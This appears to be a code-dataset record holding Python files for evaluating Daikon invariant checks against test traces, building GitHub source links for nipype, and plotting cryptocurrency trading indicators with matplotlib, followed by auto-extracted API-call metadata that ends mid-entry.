code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
from typing import Iterator, Tuple, Set, List, Dict, Any, Optional, Type
import logging
import subprocess
import pexpect
import tempfile
import os
import json
import csv
import attr
import functools
import time
import math
import argparse
import concurrent.futures
from ruamel.yaml import YAML
from ground_truth import DatabaseEntry
from compare_traces import load_file
from hash_mutants import mutation_to_uid
from verify_test_data import VerifiedEntry, NewDatabaseEntry, Status
from filter_truth import VALID_LIST_OUTPUT
from enum import Enum
logger = logging.getLogger("houston") # type: logging.Logger
logger.setLevel(logging.DEBUG)
def setup_logging(verbose: bool = False) -> None:
log_to_stdout = logging.StreamHandler()
log_to_stdout.setLevel(logging.DEBUG if verbose else logging.INFO)
logger.addHandler(log_to_stdout)
logging.getLogger('houston').addHandler(log_to_stdout)
def setup_arg_parser():
parser = argparse.ArgumentParser(description='Validate test traces')
parser.add_argument('database', type=str, action='store',
help='path to test database yaml file.')
parser.add_argument('daikon_out', type=str, action='store',
help='path to the output invariant checker')
parser.add_argument('nonce_file', type=str, action='store',
help='path to nonce file.')
parser.add_argument('ground_truth', type=str, action='store',
help='path to ground truth traces')
# parser.add_argument('output', action='store', type=str,
# help='the file where the results will be stored')
parser.add_argument('--verbose', action='store_true',
help='increases logging verbosity.')
parser.add_argument('--compute-score', action='store',
default='',
help='path to a csv file to add the accuracy results')
args = parser.parse_args()
return args
def compute_score(entries: List[NewDatabaseEntry],
score_file: str = '',
models_dir: str = '') -> None:
tp, fp, tn, fn = 0, 0, 0, 0
for o, t in entries:
if Status.REJECTED in o.verified:
fp += 1
else:
tn += 1
if Status.REJECTED in t.verified:
tp += 1
else:
fn += 1
logger.info("TP: %d, TN: %d, FP: %d, FN: %d", tp, tn, fp, fn)
precision = float(tp)/float(tp + fp) if tp+fp != 0 else float('nan')
recall = float(tp)/float(tp + fn) if tp+fn != 0 else float('nan')
f_score = (2 * tp) / (2 * tp + fp + fn) if (tp + fp + fn) else float('nan')
logger.info("Precision: %f\nRecall: %f\nF-score: %f",
precision, recall, f_score)
if not score_file:
return
typ = 'daikon'
seed = os.path.basename(os.path.dirname(models_dir))
data_amount = os.path.basename(os.path.dirname(os.path.dirname(models_dir)))
with open(score_file, 'a') as f:
f.write(', '.join([data_amount, seed, typ, '-', str(tp), str(tn), str(fp), str(fn),
str(precision), str(recall), str(f_score)]))
f.write('\n')
if __name__=="__main__":
args = setup_arg_parser()
setup_logging(args.verbose)
results = []
with open(args.database, 'r') as f:
db = YAML().load(f)
with open(args.daikon_out, 'r') as f:
invalidated = YAML().load(f)
with open(args.nonce_file, 'r') as f:
fn_to_nonce = YAML().load(f)
with open(os.path.join(args.ground_truth, VALID_LIST_OUTPUT), 'r') as f:
all_truth = YAML().load(f)
all_truth = [os.path.join(args.ground_truth, t) for t in all_truth]
entries = [DatabaseEntry.from_dict(e) for e in db['entries'] if e['inconsistent']]
logger.info("starting with %d mutants", len(entries))
traces = []
for entry in entries:
for _, trace_fn in entry.fn_inconsistent_traces:
trace = VerifiedEntry(trace_fn,
[Status.REJECTED if n in invalidated else Status.ACCEPTED for n in fn_to_nonce[trace_fn]])
traces.append(trace)
oracles = []
for oracle_fn in all_truth[:len(traces)]:
oracle = VerifiedEntry(oracle_fn,
[Status.REJECTED if n in invalidated else Status.ACCEPTED for n in fn_to_nonce[oracle_fn]])
oracles.append(oracle)
validated_results = list(zip(oracles, traces))
logger.debug("finished evaluating %d", len(validated_results))
jsn = {
'oracle-directory': db['oracle-directory'],
'snapshot': db['snapshot'],
'entries': [e.to_dict() for e in validated_results]
}
with open(args.output, 'w') as f:
YAML().dump(jsn, f)
logger.info("wrote results to file")
if args.compute_score:
compute_score(validated_results,
args.compute_score,
args.daikon_out)
else:
compute_score(validated_results)
|
[
"argparse.ArgumentParser",
"os.path.dirname",
"logging.StreamHandler",
"ruamel.yaml.YAML",
"verify_test_data.VerifiedEntry",
"ground_truth.DatabaseEntry.from_dict",
"os.path.join",
"logging.getLogger"
] |
[((559, 587), 'logging.getLogger', 'logging.getLogger', (['"""houston"""'], {}), "('houston')\n", (576, 587), False, 'import logging\n'), ((715, 738), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (736, 738), False, 'import logging\n'), ((945, 1004), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Validate test traces"""'}), "(description='Validate test traces')\n", (968, 1004), False, 'import argparse\n'), ((2851, 2878), 'os.path.dirname', 'os.path.dirname', (['models_dir'], {}), '(models_dir)\n', (2866, 2878), False, 'import os\n'), ((3649, 3683), 'os.path.join', 'os.path.join', (['args.ground_truth', 't'], {}), '(args.ground_truth, t)\n', (3661, 3683), False, 'import os\n'), ((3721, 3747), 'ground_truth.DatabaseEntry.from_dict', 'DatabaseEntry.from_dict', (['e'], {}), '(e)\n', (3744, 3747), False, 'from ground_truth import DatabaseEntry\n'), ((4232, 4355), 'verify_test_data.VerifiedEntry', 'VerifiedEntry', (['oracle_fn', '[(Status.REJECTED if n in invalidated else Status.ACCEPTED) for n in\n fn_to_nonce[oracle_fn]]'], {}), '(oracle_fn, [(Status.REJECTED if n in invalidated else Status.\n ACCEPTED) for n in fn_to_nonce[oracle_fn]])\n', (4245, 4355), False, 'from verify_test_data import VerifiedEntry, NewDatabaseEntry, Status\n'), ((851, 879), 'logging.getLogger', 'logging.getLogger', (['"""houston"""'], {}), "('houston')\n", (868, 879), False, 'import logging\n'), ((2931, 2958), 'os.path.dirname', 'os.path.dirname', (['models_dir'], {}), '(models_dir)\n', (2946, 2958), False, 'import os\n'), ((3534, 3584), 'os.path.join', 'os.path.join', (['args.ground_truth', 'VALID_LIST_OUTPUT'], {}), '(args.ground_truth, VALID_LIST_OUTPUT)\n', (3546, 3584), False, 'import os\n'), ((3972, 4093), 'verify_test_data.VerifiedEntry', 'VerifiedEntry', (['trace_fn', '[(Status.REJECTED if n in invalidated else Status.ACCEPTED) for n in\n fn_to_nonce[trace_fn]]'], {}), '(trace_fn, [(Status.REJECTED if n in invalidated else Status.\n ACCEPTED) for n in fn_to_nonce[trace_fn]])\n', (3985, 4093), False, 'from verify_test_data import VerifiedEntry, NewDatabaseEntry, Status\n'), ((3344, 3350), 'ruamel.yaml.YAML', 'YAML', ([], {}), '()\n', (3348, 3350), False, 'from ruamel.yaml import YAML\n'), ((3424, 3430), 'ruamel.yaml.YAML', 'YAML', ([], {}), '()\n', (3428, 3430), False, 'from ruamel.yaml import YAML\n'), ((3504, 3510), 'ruamel.yaml.YAML', 'YAML', ([], {}), '()\n', (3508, 3510), False, 'from ruamel.yaml import YAML\n'), ((3617, 3623), 'ruamel.yaml.YAML', 'YAML', ([], {}), '()\n', (3621, 3623), False, 'from ruamel.yaml import YAML\n'), ((4747, 4753), 'ruamel.yaml.YAML', 'YAML', ([], {}), '()\n', (4751, 4753), False, 'from ruamel.yaml import YAML\n')]
|
"""Build a file URL."""
import os
import inspect
import subprocess
REVISION_CMD = "git rev-parse --short HEAD"
def _get_git_revision():
# Comes from scikit-learn
# https://github.com/scikit-learn/scikit-learn/blob/master/doc/sphinxext/github_link.py
try:
revision = subprocess.check_output(REVISION_CMD.split()).strip()
except (subprocess.CalledProcessError, OSError):
return None
return revision.decode("utf-8")
def get_url(obj):
"""Return local or remote url for an object."""
filename = inspect.getsourcefile(obj)
uri = "file://%s" % filename
revision = _get_git_revision()
if revision is not None:
shortfile = os.path.join("nipype", filename.split("nipype/")[-1])
uri = "http://github.com/nipy/nipype/blob/%s/%s" % (revision, shortfile,)
lines, lstart = inspect.getsourcelines(obj)
lend = len(lines) + lstart
return "%s#L%d-L%d" % (uri, lstart, lend)
|
[
"inspect.getsourcelines",
"inspect.getsourcefile"
] |
[((539, 565), 'inspect.getsourcefile', 'inspect.getsourcefile', (['obj'], {}), '(obj)\n', (560, 565), False, 'import inspect\n'), ((839, 866), 'inspect.getsourcelines', 'inspect.getsourcelines', (['obj'], {}), '(obj)\n', (861, 866), False, 'import inspect\n')]
|
"""Plots (and/or saves) the graphical trading data using Matplotlib"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from models.Trading import TechnicalAnalysis
import datetime, re, sys
sys.path.append('.')
class TradingGraphs():
def __init__(self, technicalAnalysis):
"""Trading Graphs object model
Parameters
----------
technicalAnalysis : object
TechnicalAnalysis object to provide the trading data to visualise
"""
# validates the technicalAnalysis object
if not isinstance(technicalAnalysis, TechnicalAnalysis):
raise TypeError('Coinbase Pro model required.')
# only one figure can be open at a time, close all open figures
plt.close('all')
self.technicalAnalysis = technicalAnalysis
# stores the pandas dataframe from technicalAnalysis object
self.df = technicalAnalysis.getDataFrame()
# stores the support and resistance levels from technicalAnalysis object
self.levels = technicalAnalysis.supportResistanceLevels()
# seaborn style plots
plt.style.use('seaborn')
def renderBuySellSignalEMA1226(self, saveFile='', saveOnly=False):
"""Render the EMA12 and EMA26 buy and sell signals
Parameters
----------
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
buysignals = self.df[self.df.ema12gtema26co == True]
sellsignals = self.df[self.df.ema12ltema26co == True]
plt.subplot(111)
plt.plot(self.df.close, label="price", color="royalblue")
plt.plot(self.df.ema12, label="ema12", color="orange")
plt.plot(self.df.ema26, label="ema26", color="purple")
plt.ylabel('Price')
for idx in buysignals.index.tolist():
plt.axvline(x=idx, color='green')
for idx in sellsignals.index.tolist():
plt.axvline(x=idx, color='red')
plt.xticks(rotation=90)
plt.tight_layout()
plt.legend()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderBuySellSignalEMA1226MACD(self, saveFile='', saveOnly=False):
"""Render the EMA12, EMA26 and MACD buy and sell signals
Parameters
----------
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
buysignals = ((self.df.ema12gtema26co == True) & (self.df.macdgtsignal == True) & (self.df.obv_pc >= 2)) | ((self.df.ema12gtema26 == True) & (self.df.macdgtsignal == True) & (self.df.obv_pc >= 5))
sellsignals = ((self.df.ema12ltema26co == True) & (self.df.macdltsignal == True)) | ((self.df.ema12gtema26 == True) & (self.df.macdltsignal == True) & (self.df.obv_pc < 0))
df_signals = self.df[(buysignals) | (sellsignals)]
ax1 = plt.subplot(211)
plt.plot(self.df.close, label="price", color="royalblue")
plt.plot(self.df.ema12, label="ema12", color="orange")
plt.plot(self.df.ema26, label="ema26", color="purple")
plt.ylabel('Price')
action = ''
last_action = ''
for idx, row in df_signals.iterrows():
if row['ema12gtema26co'] == True and row['macdgtsignal'] == True and last_action != 'buy':
action = 'buy'
plt.axvline(x=idx, color='green')
elif row['ema12ltema26'] == True and row['macdltsignal'] == True and action == 'buy':
action = 'sell'
plt.axvline(x=idx, color='red')
last_action = action
plt.xticks(rotation=90)
plt.subplot(212, sharex=ax1)
plt.plot(self.df.macd, label="macd")
plt.plot(self.df.signal, label="signal")
plt.legend()
plt.ylabel('Divergence')
plt.xticks(rotation=90)
plt.tight_layout()
plt.legend()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderPriceEMA12EMA26(self, saveFile='', saveOnly=False):
"""Render the price, EMA12 and EMA26
Parameters
----------
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
plt.subplot(111)
plt.plot(self.df.close, label="price")
plt.plot(self.df.ema12, label="ema12")
plt.plot(self.df.ema26, label="ema26")
plt.legend()
plt.ylabel('Price')
plt.xticks(rotation=90)
plt.tight_layout()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderPriceSupportResistance(self, saveFile='', saveOnly=False):
"""Render the price, support and resistance levels
Parameters
----------
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
plt.subplot(111)
plt.plot(self.df.close)
plt.ylabel('Price')
for level in self.levels:
plt.axhline(y=level, color='grey')
plt.xticks(rotation=90)
plt.tight_layout()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderEMAandMACD(self, period=30, saveFile='', saveOnly=False):
"""Render the price, EMA12, EMA26 and MACD
Parameters
----------
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
if not isinstance(period, int):
raise TypeError('Period parameter is not perioderic.')
if period < 1 or period > len(self.df):
raise ValueError('Period is out of range')
df_subset = self.df.iloc[-period::]
date = pd.to_datetime(df_subset.index).to_pydatetime()
df_subset_length = len(df_subset)
indices = np.arange(df_subset_length) # the evenly spaced plot indices
def format_date(x, pos=None): #pylint: disable=unused-argument
thisind = np.clip(int(x + 0.5), 0, df_subset_length - 1)
return date[thisind].strftime('%Y-%m-%d %H:%M:%S')
fig, (ax1, ax2) = plt.subplots(nrows=2, figsize=(12, 6))
fig.suptitle(df_subset.iloc[0]['market'] + ' | ' + str(df_subset.iloc[0]['granularity']), fontsize=16)
plt.style.use('seaborn')
plt.xticks(rotation=90)
#plt.tight_layout()
indices = np.arange(len(df_subset))
ax1.plot(indices, df_subset['close'], label='price', color='royalblue')
ax1.plot(indices, df_subset['ema12'], label='ema12', color='orange')
ax1.plot(indices, df_subset['ema26'], label='ema26', color='purple')
ax1.xaxis.set_major_formatter(ticker.FuncFormatter(format_date))
ax1.set_title('Price, EMA12 and EMA26')
ax1.set_ylabel('Price')
ax1.legend()
fig.autofmt_xdate()
ax2.plot(indices, df_subset.macd, label='macd')
ax2.plot(indices, df_subset.signal, label='signal')
ax2.xaxis.set_major_formatter(ticker.FuncFormatter(format_date))
ax2.set_title('MACD')
ax2.set_ylabel('Divergence')
ax2.legend()
fig.autofmt_xdate()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderSeasonalARIMAModel(self, saveFile='', saveOnly=False):
"""Render the seasonal ARIMA model
Parameters
----------
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
fittedValues = self.technicalAnalysis.seasonalARIMAModelFittedValues()
plt.plot(self.df['close'], label='original')
plt.plot(fittedValues, color='red', label='fitted')
plt.title('RSS: %.4f' % sum((fittedValues-self.df['close'])**2))
plt.legend()
plt.ylabel('Price')
plt.xticks(rotation=90)
plt.tight_layout()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderSeasonalARIMAModelPredictionDays(self, days=30, saveFile='', saveOnly=False):
"""Render the seasonal ARIMA model prediction
Parameters
----------
days : int
Number of days to predict
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
results_ARIMA = self.technicalAnalysis.seasonalARIMAModel()
df = pd.DataFrame(self.df['close'])
start_date = df.last_valid_index()
end_date = start_date + datetime.timedelta(days=days)
pred = results_ARIMA.predict(start=str(start_date), end=str(end_date), dynamic=True)
plt.plot(pred, label='prediction')
plt.ylabel('Price')
plt.xlabel('Days')
plt.xticks(rotation=90)
plt.tight_layout()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderSMAandMACD(self, saveFile='', saveOnly=False):
"""Render the price, SMA20, SMA50, and SMA200
Parameters
----------
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
ax1 = plt.subplot(211)
plt.plot(self.df.close, label="price")
plt.plot(self.df.sma20, label="sma20")
plt.plot(self.df.sma50, label="sma50")
plt.plot(self.df.sma200, label="sma200")
plt.legend()
plt.ylabel('Price')
plt.xticks(rotation=90)
plt.subplot(212, sharex=ax1)
plt.plot(self.df.macd, label="macd")
plt.plot(self.df.signal, label="signal")
plt.legend()
plt.ylabel('Price')
plt.xlabel('Days')
plt.xticks(rotation=90)
plt.tight_layout()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderEMA12EMA26CloseCandles(self, period=30, outputpng=''):
if not isinstance(period, int):
raise TypeError('Period parameter is not perioderic.')
if period < 1 or period > len(self.df):
raise ValueError('Period is out of range')
df_subset = self.df.iloc[-period::]
fig, axes = plt.subplots(ncols=1, figsize=(12, 6)) #pylint: disable=unused-variable
fig.autofmt_xdate()
ax1 = plt.subplot(111)
ax1.set_title(df_subset.iloc[0]['market'] + ' | ' + str(df_subset.iloc[0]['granularity']))
plt.style.use('seaborn')
plt.plot(df_subset['close'], label='price', color='royalblue')
plt.plot(df_subset['ema12'], label='ema12', color='orange')
plt.plot(df_subset['ema26'], label='ema26', color='purple')
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False) # labels along the bottom edge are off
df_candlestick = self.df[self.df['three_white_soldiers'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'gx')
df_candlestick = self.df[self.df['three_black_crows'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'rx')
df_candlestick = self.df[self.df['inverted_hammer'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'g^')
df_candlestick = self.df[self.df['hammer'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'rv')
df_candlestick = self.df[self.df['hanging_man'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'go')
df_candlestick = self.df[self.df['shooting_star'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'r*')
df_candlestick = self.df[self.df['doji'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'yd')
df_candlestick = self.df[self.df['three_line_strike'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'y^')
df_candlestick = self.df[self.df['two_black_gapping'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'yv')
df_candlestick = self.df[self.df['evening_star'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'mv')
df_candlestick = self.df[self.df['abandoned_baby'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'm^')
plt.ylabel('Price')
plt.xticks(rotation=90)
plt.tight_layout()
plt.legend()
if outputpng != '':
plt.savefig(outputpng)
plt.show()
|
[
"matplotlib.pyplot.style.use",
"numpy.arange",
"matplotlib.pyplot.tick_params",
"matplotlib.pyplot.tight_layout",
"sys.path.append",
"pandas.DataFrame",
"matplotlib.pyplot.axvline",
"matplotlib.pyplot.close",
"datetime.timedelta",
"matplotlib.pyplot.xticks",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.axhline",
"matplotlib.pyplot.show",
"matplotlib.pyplot.legend",
"numpy.min",
"matplotlib.ticker.FuncFormatter",
"pandas.to_datetime",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.savefig"
] |
[((248, 268), 'sys.path.append', 'sys.path.append', (['"""."""'], {}), "('.')\n", (263, 268), False, 'import datetime, re, sys\n'), ((799, 815), 'matplotlib.pyplot.close', 'plt.close', (['"""all"""'], {}), "('all')\n", (808, 815), True, 'import matplotlib.pyplot as plt\n'), ((1175, 1199), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""seaborn"""'], {}), "('seaborn')\n", (1188, 1199), True, 'import matplotlib.pyplot as plt\n'), ((1659, 1675), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (1670, 1675), True, 'import matplotlib.pyplot as plt\n'), ((1684, 1741), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.close'], {'label': '"""price"""', 'color': '"""royalblue"""'}), "(self.df.close, label='price', color='royalblue')\n", (1692, 1741), True, 'import matplotlib.pyplot as plt\n'), ((1750, 1804), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.ema12'], {'label': '"""ema12"""', 'color': '"""orange"""'}), "(self.df.ema12, label='ema12', color='orange')\n", (1758, 1804), True, 'import matplotlib.pyplot as plt\n'), ((1813, 1867), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.ema26'], {'label': '"""ema26"""', 'color': '"""purple"""'}), "(self.df.ema26, label='ema26', color='purple')\n", (1821, 1867), True, 'import matplotlib.pyplot as plt\n'), ((1876, 1895), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (1886, 1895), True, 'import matplotlib.pyplot as plt\n'), ((2090, 2113), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (2100, 2113), True, 'import matplotlib.pyplot as plt\n'), ((2122, 2140), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (2138, 2140), True, 'import matplotlib.pyplot as plt\n'), ((2149, 2161), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (2159, 2161), True, 'import matplotlib.pyplot as plt\n'), ((3189, 3205), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(211)'], {}), '(211)\n', (3200, 3205), True, 'import matplotlib.pyplot as plt\n'), ((3214, 3271), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.close'], {'label': '"""price"""', 'color': '"""royalblue"""'}), "(self.df.close, label='price', color='royalblue')\n", (3222, 3271), True, 'import matplotlib.pyplot as plt\n'), ((3280, 3334), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.ema12'], {'label': '"""ema12"""', 'color': '"""orange"""'}), "(self.df.ema12, label='ema12', color='orange')\n", (3288, 3334), True, 'import matplotlib.pyplot as plt\n'), ((3343, 3397), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.ema26'], {'label': '"""ema26"""', 'color': '"""purple"""'}), "(self.df.ema26, label='ema26', color='purple')\n", (3351, 3397), True, 'import matplotlib.pyplot as plt\n'), ((3406, 3425), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (3416, 3425), True, 'import matplotlib.pyplot as plt\n'), ((3924, 3947), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (3934, 3947), True, 'import matplotlib.pyplot as plt\n'), ((3957, 3985), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(212)'], {'sharex': 'ax1'}), '(212, sharex=ax1)\n', (3968, 3985), True, 'import matplotlib.pyplot as plt\n'), ((3994, 4030), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.macd'], {'label': '"""macd"""'}), "(self.df.macd, label='macd')\n", (4002, 4030), True, 'import matplotlib.pyplot as plt\n'), ((4039, 4079), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.signal'], {'label': '"""signal"""'}), "(self.df.signal, label='signal')\n", (4047, 4079), True, 'import matplotlib.pyplot as plt\n'), ((4088, 4100), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (4098, 4100), True, 'import matplotlib.pyplot as plt\n'), ((4109, 4133), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Divergence"""'], {}), "('Divergence')\n", (4119, 4133), True, 'import matplotlib.pyplot as plt\n'), ((4142, 4165), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (4152, 4165), True, 'import matplotlib.pyplot as plt\n'), ((4175, 4193), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (4191, 4193), True, 'import matplotlib.pyplot as plt\n'), ((4202, 4214), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (4212, 4214), True, 'import matplotlib.pyplot as plt\n'), ((4760, 4776), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (4771, 4776), True, 'import matplotlib.pyplot as plt\n'), ((4785, 4823), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.close'], {'label': '"""price"""'}), "(self.df.close, label='price')\n", (4793, 4823), True, 'import matplotlib.pyplot as plt\n'), ((4832, 4870), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.ema12'], {'label': '"""ema12"""'}), "(self.df.ema12, label='ema12')\n", (4840, 4870), True, 'import matplotlib.pyplot as plt\n'), ((4879, 4917), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.ema26'], {'label': '"""ema26"""'}), "(self.df.ema26, label='ema26')\n", (4887, 4917), True, 'import matplotlib.pyplot as plt\n'), ((4926, 4938), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (4936, 4938), True, 'import matplotlib.pyplot as plt\n'), ((4947, 4966), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (4957, 4966), True, 'import matplotlib.pyplot as plt\n'), ((4975, 4998), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (4985, 4998), True, 'import matplotlib.pyplot as plt\n'), ((5007, 5025), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5023, 5025), True, 'import matplotlib.pyplot as plt\n'), ((5583, 5599), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (5594, 5599), True, 'import matplotlib.pyplot as plt\n'), ((5608, 5631), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.close'], {}), '(self.df.close)\n', (5616, 5631), True, 'import matplotlib.pyplot as plt\n'), ((5640, 5659), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (5650, 5659), True, 'import matplotlib.pyplot as plt\n'), ((5751, 5774), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (5761, 5774), True, 'import matplotlib.pyplot as plt\n'), ((5783, 5801), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5799, 5801), True, 'import matplotlib.pyplot as plt\n'), ((6733, 6760), 'numpy.arange', 'np.arange', (['df_subset_length'], {}), '(df_subset_length)\n', (6742, 6760), True, 'import numpy as np\n'), ((7026, 7064), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(2)', 'figsize': '(12, 6)'}), '(nrows=2, figsize=(12, 6))\n', (7038, 7064), True, 'import matplotlib.pyplot as plt\n'), ((7184, 7208), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""seaborn"""'], {}), "('seaborn')\n", (7197, 7208), True, 'import matplotlib.pyplot as plt\n'), ((7217, 7240), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (7227, 7240), True, 'import matplotlib.pyplot as plt\n'), ((8684, 8728), 'matplotlib.pyplot.plot', 'plt.plot', (["self.df['close']"], {'label': '"""original"""'}), "(self.df['close'], label='original')\n", (8692, 8728), True, 'import matplotlib.pyplot as plt\n'), ((8737, 8788), 'matplotlib.pyplot.plot', 'plt.plot', (['fittedValues'], {'color': '"""red"""', 'label': '"""fitted"""'}), "(fittedValues, color='red', label='fitted')\n", (8745, 8788), True, 'import matplotlib.pyplot as plt\n'), ((8870, 8882), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (8880, 8882), True, 'import matplotlib.pyplot as plt\n'), ((8891, 8910), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (8901, 8910), True, 'import matplotlib.pyplot as plt\n'), ((8919, 8942), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (8929, 8942), True, 'import matplotlib.pyplot as plt\n'), ((8951, 8969), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (8967, 8969), True, 'import matplotlib.pyplot as plt\n'), ((9685, 9715), 'pandas.DataFrame', 'pd.DataFrame', (["self.df['close']"], {}), "(self.df['close'])\n", (9697, 9715), True, 'import pandas as pd\n'), ((9923, 9957), 'matplotlib.pyplot.plot', 'plt.plot', (['pred'], {'label': '"""prediction"""'}), "(pred, 